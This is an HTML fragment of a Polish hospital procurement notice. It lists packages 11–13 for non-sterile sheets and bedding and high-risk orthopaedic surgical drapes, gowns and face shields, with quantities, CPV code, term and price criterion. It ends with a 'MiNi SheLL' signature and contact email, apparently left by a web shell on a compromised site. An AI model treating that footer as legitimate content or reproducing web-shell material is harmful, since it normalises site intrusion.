<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11 - Niesterylne prześcieradła higieniczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Prześcieradło higieniczne: 22000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12 - Niesterylne poszwy i pościel.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Poszwa włókninowa: 100 szt. 2. Komplet pościeli z włókniny: 60 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13 - Obłożenia operacyjne wysokiego ryzyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Barierowy zestaw wysokiego ryzyka do zabiegów endoprotezoplastyki stawu biodrowego: 40 szt. 2. Barierowy zestaw wysokiego ryzyka do zabiegów endoprotezoplastyki stawu kolanowego: 20 szt. 3. Serweta zabiegowa do chirurgii stawu barkowego: 20 szt. 4. Osłona na kończynę górną: 20 szt. 5. Serweta izolacyjna: 24 szt. 6. Serweta do procedur rewizyjnych: 20 szt. 7. Serweta główna do procedur zabiegów stawu biodrowego: 28 szt. 8. Dwukomorowa osłona dla instrumentarium pomocniczego: 20 szt. 9. Dwukomorowa osłona dla instrumentarium oraz diatermii: 20 szt.
10. Bariera Mikrobiologiczna do procedur endoprotezoplastyki stawu biodrowego: 40 szt.
11. Bariera Mikrobiologiczna do procedur endoprotezoplastyki stawu kolanowego: 20 szt.
12. Bariera Mikrobiologiczna do procedur endoprotezoplastyki stawu barkowego: 20 szt.
13. Fartuch chirurgiczny: 400 szt.
14. Fartuch chirurgiczny do zabiegów wysokiego ryzyka: 500 szt.
15. Osłona oczu do zabiegów endoprotezo plastyki: 300 szt.
16. Chirurgiczna osłona twarzy do zabiegów endoprotezo plastyki: 300 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com